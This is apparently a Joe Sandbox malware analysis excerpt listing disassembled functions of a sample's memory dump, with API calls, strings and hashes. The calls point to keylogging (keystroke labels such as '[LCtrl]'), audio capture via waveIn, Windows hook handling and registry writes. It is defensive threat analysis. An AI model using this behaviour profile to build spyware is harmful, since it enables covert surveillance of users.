                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004036EB
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@
                              • String ID:
                              • API String ID: 2599707790-0
                              • Opcode ID: ac5247aa85bbd6be4254a4db4df1c1c2bebf39489b54b834f55a8b66f66bf73a
                              • Instruction ID: ce469ae2fa8136e1a9f0fe53df6847e3631b9c5038cfbca0e221b482f1c808aa
                              • Opcode Fuzzy Hash: ac5247aa85bbd6be4254a4db4df1c1c2bebf39489b54b834f55a8b66f66bf73a
                              • Instruction Fuzzy Hash: A8E00A31210557CBC7249F30EA5C4E5B764BA91619300447A9157515B0DFB4AD49CB5D
                              APIs
                              • RegCreateKeyA.ADVAPI32(00409B23,?,?), ref: 00409098
                              • RegSetValueExA.ADVAPI32(?,hRA,00000000,0000000B,?,00000008,00415268,?,00409B23,00000000), ref: 004090B3
                              • RegCloseKey.ADVAPI32(?,?,00409B23,00000000), ref: 004090BE
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseCreateValue
                              • String ID: hRA
                              • API String ID: 1818849710-819137882
                              • Opcode ID: 47dcfed047945252874ef2030ec9f55be3ad7af594f0f386cf4e6306e2d48049
                              • Instruction ID: 45296832074a86694a0120e67756151a47aa0ea66b010438851f7b77956f428d
                              • Opcode Fuzzy Hash: 47dcfed047945252874ef2030ec9f55be3ad7af594f0f386cf4e6306e2d48049
                              • Instruction Fuzzy Hash: A4E0C932540218BBDF115F90FD05FDA3B6DEB08761F00C021FE199A161D771DA609B54
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?), ref: 00403605
                              • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?), ref: 00403612
                              • _CxxThrowException.MSVCRT(?,004119F0), ref: 00403621
                                • Part of subcall function 0040FC2C: free.MSVCRT(?,00401C53,?,?,00401C39,00000000,?,00401BE7,?,?,00401B82,?,00000000,?,?,00401B4A), ref: 0040FC30
                              Strings
                              • invalid vector<T> subscript, xrefs: 00403600
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@free
                              • String ID: invalid vector<T> subscript
                              • API String ID: 2273067808-3016609489
                              • Opcode ID: 23a2721963ee5b81bf9d54976ac51af616b6fac7c107dadb20cd092e6ff66c0e
                              • Instruction ID: d1dc714aa17fc7b7442ac04cbb7cbb2b6be57595b17b16616ed7d09586dc421c
                              • Opcode Fuzzy Hash: 23a2721963ee5b81bf9d54976ac51af616b6fac7c107dadb20cd092e6ff66c0e
                              • Instruction Fuzzy Hash: F3E0487185420F7BDF04FBE1DD4ADEEB77DFA14305B504036F904A20A0EA756A4ACB69
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,?,?,?,?,004012A3,?,?,?,004074B7,0000000E,004108CC,00000000), ref: 004012DA
                              • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?,?,?,?,?,004012A3,?,?,?,004074B7,0000000E,004108CC,00000000), ref: 004012E7
                              • _CxxThrowException.MSVCRT(?,004119F0), ref: 004012F6
                                • Part of subcall function 00401305: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00401300,?,?,?,?,004012A3,?,?,?,004074B7,0000000E,004108CC,00000000), ref: 00401312
                              Strings
                              • invalid vector<T> subscript, xrefs: 004012D5
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@D@1@@D@2@@std@@$??0out_of_range@std@@D@2@@1@@ExceptionThrowV?$basic_string@
                              • String ID: invalid vector<T> subscript
                              • API String ID: 4148323614-3016609489
                              • Opcode ID: 9661a228b2e9748f7b8567c3925db49a400b5d1eaa57c5b6f529c0f008786bf5
                              • Instruction ID: 885d5109308db86c39cf624aab1bba59d6d0b6b2a3733cbd4a3c7a04b8bfaa9f
                              • Opcode Fuzzy Hash: 9661a228b2e9748f7b8567c3925db49a400b5d1eaa57c5b6f529c0f008786bf5
                              • Instruction Fuzzy Hash: 53E0127181410FAADB04F7E5D94ADED777CB9043057600036BD02B24E1DAB855498B2A
                              APIs
                              • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 0040F8AC
                              • GetProcAddress.KERNEL32(00000000), ref: 0040F8B3
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: GetConsoleWindow$kernel32.dll
                              • API String ID: 2574300362-100875112
                              • Opcode ID: 510d5923eb8639a7d885d72a367858d9807e1c659d0f746c0c92ce176c01cde6
                              • Instruction ID: 827c4046bcd6e5c73998b2cbf4f49e030bf6490dcf6eebc42fb88a3b65635bfa
                              • Opcode Fuzzy Hash: 510d5923eb8639a7d885d72a367858d9807e1c659d0f746c0c92ce176c01cde6
                              • Instruction Fuzzy Hash: 69C092B5980200BFD7106FA1EC4DED93AB4AA48742720C136F60AE19B4CBBD10C19A1E
                              APIs
                              • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(?,00000000,00415268,?,00401465,00000000,?,?,?,0040B52E,00000000), ref: 00401498
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,00401465,00000000,?,?,?,0040B52E,00000000), ref: 004014B0
                              • waveInPrepareHeader.WINMM(025D11D8,00000020,?,00401465,00000000,?,?,?,0040B52E,00000000), ref: 00401508
                              • waveInAddBuffer.WINMM(?,00000020,?,00401465,00000000,?,?,?,0040B52E,00000000), ref: 0040151E
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@?resize@?$basic_string@BufferHeaderPrepare
                              • String ID:
                              • API String ID: 1952094867-0
                              • Opcode ID: c43d5b855978ab5546af03f7988427d20661d7bf7e5b36f0c6026f81f0c57d97
                              • Instruction ID: 607d35f18d4bb3c038525a4507ad7304f57bd8fd619bab3b66f3d3b81191445e
                              • Opcode Fuzzy Hash: c43d5b855978ab5546af03f7988427d20661d7bf7e5b36f0c6026f81f0c57d97
                              • Instruction Fuzzy Hash: BD110D35A10A00FFCB168F55EC58BEA7BA5EBC9318700C47EEA4EC7365D671A841CB48
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,80000002), ref: 00408F12
                              • RegQueryValueExA.ADVAPI32(80000002,004075CB,00000000,00000000,?,00000400), ref: 00408F31
                              • RegCloseKey.ADVAPI32(80000002), ref: 00408F3A
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?), ref: 00408F59
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@OpenQueryU?$char_traits@Value
                              • String ID:
                              • API String ID: 2462357041-0
                              • Opcode ID: 6096438dd2eed9e4574e4a1dd84254fd0db2e199f98c401320f7f766a01d9ba8
                              • Instruction ID: af5f393f80e90c15eb86e02cdebdcddb53bb09070e540c88b9aeee95ea817081
                              • Opcode Fuzzy Hash: 6096438dd2eed9e4574e4a1dd84254fd0db2e199f98c401320f7f766a01d9ba8
                              • Instruction Fuzzy Hash: CB01E4B510010EBFDB11DF50ED45FDA7B7DEB08704F508162BB19AA0A0D7B0AA59DB58
                              APIs
                              • TerminateThread.KERNEL32(00000000,00000000,00415A30,00415940,00415268,0040A63B,0040A71E,00000001), ref: 0040434C
                              • CloseHandle.KERNEL32(00000000), ref: 0040435C
                              • UnhookWindowsHookEx.USER32(00000000), ref: 0040436E
                              • TerminateThread.KERNEL32(0040380C,00000000), ref: 0040437C
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: TerminateThread$CloseHandleHookUnhookWindows
                              • String ID:
                              • API String ID: 952708117-0
                              • Opcode ID: 21f92a0503a4c508299fb2519971da6ba8f4e0d620dc769b09316a04903e5818
                              • Instruction ID: b3774055a663eb231de0d977992da6d56e6fa1a05363ce64aae77dfed93c93a6
                              • Opcode Fuzzy Hash: 21f92a0503a4c508299fb2519971da6ba8f4e0d620dc769b09316a04903e5818
                              • Instruction Fuzzy Hash: 2BF0E9B22003446FD7715F644CC089BBB9DBA95360350287FEAC293A11C275EC819718
                              APIs
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F00,?,00405E64), ref: 00403AAD
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F00,?,00405E64), ref: 00403AC0
                              • SetEvent.KERNEL32(00000000,?,00405E64), ref: 00403AC9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(76F90F00,?,00405E64), ref: 00403AD8
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@V01@@Y?$basic_string@$??1?$basic_string@Event
                              • String ID:
                              • API String ID: 3911305588-0
                              • Opcode ID: 16b6dc50432d68f6dd9f781edfb67808caec510018263165bfcd570da917996e
                              • Instruction ID: 0779d908e9be27da86272a0c0adb87f85a3e9ee435f515b886d5906f097178b3
                              • Opcode Fuzzy Hash: 16b6dc50432d68f6dd9f781edfb67808caec510018263165bfcd570da917996e
                              • Instruction Fuzzy Hash: CEF08231000749EFCB11CFA0D94CED67FA9AF05345F444469E58742961DB74F988CB58
                              APIs
                              • GetCurrentProcess.KERNEL32(?,00000000,00000001,00000002,6A41AFB0,?,0040C570,?), ref: 0040ED1F
                              • GetCurrentThread.KERNEL32 ref: 0040ED22
                              • GetCurrentProcess.KERNEL32(00000000,?,0040C570,?), ref: 0040ED29
                              • DuplicateHandle.KERNEL32(00000000,?,0040C570,?), ref: 0040ED2C
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Current$Process$DuplicateHandleThread
                              • String ID:
                              • API String ID: 3566409357-0
                              • Opcode ID: 3fa07ae3144d30a73874091d85fe8529b928e5454c1455a9c948a55732be91ca
                              • Instruction ID: a27c7ae999809b9e73f37912e12988bcc4cb6827362b4042a6689fcf131767f6
                              • Opcode Fuzzy Hash: 3fa07ae3144d30a73874091d85fe8529b928e5454c1455a9c948a55732be91ca
                              • Instruction Fuzzy Hash: 58D09E7194021C77D91027B5AC0EFC63E1CDB05761F008421B608A6091C6F654818BE4
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [LCtrl] ,?), ref: 004050A4
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                              • String ID: [LCtrl] $ [RCtrl]
                              • API String ID: 4257247948-618823999
                              • Opcode ID: 0168a093b53f0bbe9d1f7a75df0fb87eb8cb959a489310096b2281c4288ad07d
                              • Instruction ID: 69a1fac85d8d50c9318be5c9ee5530278cac5bde9cdc7065c5d4e5bcd0292750
                              • Opcode Fuzzy Hash: 0168a093b53f0bbe9d1f7a75df0fb87eb8cb959a489310096b2281c4288ad07d
                              • Instruction Fuzzy Hash: 69E09B317006047FDA14A65DC81BEBF76ACDB40754F400167F901E72C0D9F95D4086DB